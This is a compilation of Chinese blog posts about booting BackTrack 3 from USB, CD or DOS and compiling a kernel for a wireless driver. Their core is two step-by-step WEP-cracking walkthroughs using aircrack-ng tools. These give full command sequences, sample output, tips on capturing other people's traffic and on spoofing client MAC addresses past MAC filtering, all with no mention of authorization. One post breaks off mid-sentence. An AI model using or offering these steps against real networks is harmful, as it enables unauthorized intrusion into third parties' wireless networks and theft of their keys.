Chinadu's Blog

来源：Chinadu`s Blog

首先
http://wiki.remote-exploit.org/index.php/HCL:Laptops
到这个地方确认你的笔记本电脑可以做这个事情。
基本新一点的都是兼容的。

其次，到这里确认你的无线网卡兼容
http://wiki.remote-exploit.org/index.php/HCL:Wireless

补充:
显卡兼容性是最大的问题,IBM X61这种Intel内置显卡是不支持的.
如果你启动不了图形界面，哪么考虑下面两个补丁：
ATI的驱动在这里:
http://wiki.remote-exploit.org/index.php/Modules
Navida的驱动在这里
http://www.offensive-security.com/modules/nvidia.lzm
将下载的模块copy到 x:\BT3\modules 文件夹里即可

然后开始下载你需要的BT3版本：
http://wiki.remote-exploit.org/index.php/Main_Page

个人建议：
如果随便玩玩，或者是台式机，可以下载CD版的那个，因为启动一次时间不短。
如果是笔记本，硬盘又大，可以下载 USB版的那个。
USB版：
http://www.remote-exploit.org/bt3b141207.rar.torrent
http://backtrack.mjdupree.com/bt3b141207.rar
ftp://bt3.aircrack-ng.org/bt3b141207.rar

下载完以后，可以装到一个可以启动的U盘里面，或者直接扔到硬盘上，后面我会说如何用硬盘直接启动这个东西。

-----------------如何变成启动盘--------------------

光盘版的，刻录完就好了，不提了。

USB版的， 随便解压缩到某个U盘的根目录，这样，根目录下有 BT3和Boot两个文件夹。
打开一个DOS窗口， 指向你的U盘目录，比如是H盘，那么
———运行———
H:   +回车
cd boot
bootinst.bat

按提示，确认你的确是在你的U盘的目录下操作。然后OK了。

重启时插入U盘即可启动，如果有任何问题，请确认你的电脑打开了U盘启动，并且被放在第一启动项（ThinkPad可以指定排除某个启动项的，请检查）
或者在启动时按住F12， 选择 U盘启动。

如果是硬盘启动，虽然有很多办法，但是为了VISTA和XP的兼容，个人推荐 DOS启动法，即先弄一个DOS的启动，比如弄一个MouseDOS一类的，傻瓜安装，可以让电脑启动进入纯DOS状态，然后在DOS情况下，进入 硬盘上解压出的那个Boot目录里面，里面有个DOS 目录，然后执行BT3.bat 即可。
建议在执行BT3.bat前，先运行一下 Smartdrv.exe ,可以加快启动速度很多。（附件里有 Smartdrv.exe 98版）
小提示：DOS下的启动，不会自动进入图形界面，可以通过编辑 DOS目录里面的 CONFIG文件来实现：
只需要在CONFIG里面，最后加上一句：
autoexec=xconf;kdm
就可以了。
我顺便修改了MouseDOS的 Autoexec.bat文件，直接加上：
smartdrv.exe
D:
cd boot
cd dos
bt3.bat

这样启动直接进入了图形界面。
这时候的BT3，是全部在内存里的，也就是说，在系统内，任何对桌面和配置的改动都不会被记录，所以如果要记录文档，请不要放在桌面上。

———————————破解—————————————

以下是破解过程
WEP 破解
1) ifconfig -a
2) airmon-ng start wifi0 6
3) airodump-ng --ivs -w name -c 6 ath1
4) aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1
-1 is -one
5) aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1
新的第5步： aireplay-ng   -3   -b ap_mac -h XXXXXXXXXX -x   1024   ath1
6) packetforge-ng -0 -a ap_mac -h XXXXXXXXXX -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp
7) aireplay-ng -2 -r mrarp -x 1024 ath1
8) aircrack-ng -n 64 -b ap_mac name-01.ivs

我提供了样板的文件供下载。

以下一一解释：（运行这些命令都需要打开终端窗口，可以使用Ctrl+C 从文本文件Copy， 然后 Shift+Insert 粘贴入终端窗口）
1）ifconfig -a
这个命令用于找到自己的无线网卡的 Mac地址。请记录下来备用。

2) airmon-ng start wifi0 6
这个命令用于将自己的无线网卡置于Monitor 模式，即类似一个AP的效果，因此可以有抓别人包的功能。
其中 wifi0 是我电脑里面给无线网卡的 ，一般应该都是这个，第一个ifconfig -a命令可以看得到。
wifi0 后面的那个6 ，是需要破解的AP的频道，如果不知道，可以在事前左下角开始菜单里面，找到 第二项 Internet 下面的倒数第二个画着 无线网的一个工具，用它可以看到那些需要破解的AP的频道（Channel）。

运行命令成功以后，你会看到返回的提示显示出现一个 Ath1（如果你是 Athoes的无线网卡的话就是这个，其他的可能不同，不过一般都是XXX1这样）
这个就是你的用于破解的网卡代号

这个命令，简而言之，就是把你的无线网卡置于监控模式，并且指定监控的频道。
如果你发现弄错了频道，那么没关系，重新运行一遍就可以了，不过这个时候，可能就会变成 Ath2...Ath3 等等，但是好像最多运行三次，然后就会失败。

3) airodump-ng --ivs -w name -c 6 ath1
这个命令比较关键，你运行以后，就会列出所有该频道的AP。

其中，6 是指你需要监控的频道，必须和第二个命令里的一样， ath1是刚才第二步出现的别名。
这个命令运行以后，显示的内容比较多，简单介绍一下：
BSSID : 其实就是AP的Mac 地址
PWR： AP信号的大小，一般，低于10，就比较麻烦了，丢包情况严重，比较难破解
RXQ： 干扰的大小
Beacons：发送接受的包，参考信息，在跳说明有数据
#Data： 这个比较重要，是接受到可以用来破解的特殊包，如果一直不变，那么，说明没有客户端连接，破解可能很麻烦，如果对方有大文件在下载，那么这个跳的速度非常快，10来分钟就可以有足够的包来破解了，如果跳得很慢，那么，就需要用一些特殊的方式来破解了。
CH：频道
MB：网络连接速度 54就是54MB
ENC， CIPHER，AUTH
这些是加密方式，我们这次只讨论显示为   WEP 和 WEP+ OPN的
如果显示 WPA TKIP 啥的，只能密码穷举破解，个人认为希望不大。
ESSID： 这个是AP的名字，需要用到的。如果是中文貌似会出问题。因此为了阻挡别人破解，可以用中文的ESSID

过一会儿，下面会显示哪些客户端连接到了哪些AP，针对有些Mac地址加密的，很容易模拟对方客户端的Mac从而骗进去，所以不要简单地相信Mac限制功能。

这个窗口就开着好了，不用关闭，以后的命令，需

来源：Chinadu`s Blog

一、先开始制作启动U盘：将下载好的backtrack3(BT3) usb版(下载地址在文章末尾)文件bt3b141207.rar直接解压到U盘（1G以上容量）。把Boot 和BT3两个文件夹放到U盘的根目录，打开BOOT文件夹双击运行" bootinst.bat "批处理文件。U盘里就会多出4个文件." isolinux.boot" "isolinux.cfg" "isolinux.bin " "syslinux.cfg" （如果想要中文截面的BT3的菜单,就在下载BT3中文语言包。下载地址：http://file.mofile.com/cn/docs/listallfiles.do 提取密码：4871454552251231。（用的是免费的网络硬盘,广告较多,有些朋友可能没认真看没找到，我说下大概位置，输入提取码后,拉到中间找下面的几个字(红色的) 以下这三个链接后两个均可下载
推荐快车（flashget）高速下载文件 下载文件(IE浏览器) 下载文件(非IE浏览器)
）把压缩包里的"中文包"解压出来，将里面的*.lzm文件拷贝到u盘的BT3\modules目录，即可实现bt3中文化。）

二、之后重启 windows 进入BIOS设置，把BIOS里的frist boot device设置为USB-HDD（或者是USB--ZIP）再重启选择从usb启动。系统进入backtrack3 系统。

三、现在开始破解
1.在shell窗口中输入 ifconfig 命令 ，出现如下信息：
lo no wireless extensions.
eth0 no wireless extensions.
eth1 IEEE 802.11g ESSID:"" Nickname:""
Mode:（......）Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

2.找出你的无线网卡名字，我这里是 eth1.再启动你的网卡为Moniter模式(输入airmon-ng start eth1 11)。再输入 ifconfig 命令 ，返回如下信息：
lo no wireless extensions.
eth0 no wireless extensions.
eth1 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

3. 输入命令 airodump-ng -c 11 --bssid 00:1A:01:8D:C3:B2 -w outputs eth1.
命令中的11 表示要破解的频道号，bssid后面的数字表示破解目标的MAC物理地址，outputs表示要生成的包的名称。回车运行。

4.再开一个 shell 输入 aireplay-ng -1 0 -e targetnet -a 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1
其中“targetnet”表示破解目标网络名,00:1A:01:8D:C3:B2前面已解释过是指目标MAC物理地址，00:A1:C1:D8:A5:B6表示本机网卡MAC物理地址

5.再开一个 shell 输入 aireplay-ng -3 -b 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1
获取更多的数据包。

6.返回数据量到1万的时候就可以破解了。再开一个shell输入 aircrack-ng -z -b 00:1A:01:8D:C3:B2 outputs.cap 进行破解。如果破解不成功，让它继续抓包，直到破解。

注：backtrack3(BT3) usb版下载地址：

BT3(backtrack3) usb版 迅雷下载

来源：Chinadu`s Blog

1、下载编译配置文件
下载我提供的内核编译配置文件包 001.gz (21.47 KB)

001.gz (21.47 KB)
下载次数: 16

2008-9-1 12:56

，这样就不用你自己再配置了，我也是试了很多次，这个配置才不会出错，如果配置不当，编译出来的内核可能无法加载或zd211rw模块无法加载；
在BT3下，用firefox将这个文件下载到/tmp下面，并用tar解开备用；

#cd /tmp
#tar xvzf 001.gz
现在/tmp/001下有2个文件：lilo.cfg newcfg

2、下载2.6.26内核源码
在BT3下，用firefox 到 http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.26.tar.gz 下载2.6.26的内核源码，放在 /usr/src/下；

3、用tar解压

#cd /usr/src
#tar xvzf linux-2.6.26.tar.gz

解开的源码在/usr/src/linux-2.6.26目录下（/usr/src/下还有原来的2.6.21.5的内核）；

4、开始编译新内核：

a)#cd linux-2.6.26
b)#make mrproper
c)#cp /tmp/001/newcfg /usr/src/linux-2.6.26/.config
d)#make dep
e)#make clean
f)#make bzImage
g)#make modules
h)#make modules_install

5、启用新内核：
a)#mount /dev/sda1 /boot
b)#cp System.map /boot/System.map-2.6.26
c)#cp arch/i386/boot/bzImage /boot/vmlinuz-2.6.26
d)#cp /tmp/001/lilo.cfg /etc/lilo.conf
e)#/sbin/lilo
f)#umount /boot

6、完成：
退出xwindow，重启，启动菜单里多了一项 BT3-2.6.26，用它启动试试吧，
#ifconfig -a
 

来源：Chinadu`s Blog

我用U盘版的BT3和光盘版的BT3都没能在U盘上启动成功，最后发现一种简单的启动方法：1.制作USB启动盘，用usbboot1.7选usb-zip（兼容最好的）。
2.把U盘版的二个文件夹boot和bt3复制到U盘的根目录下。
3.在U盘的根目录下建立一个名为autoexec.bat文件，编辑内容为：
cd\boot\dos\bt3
bt3
保存退出。
重启电脑选usb-zip即可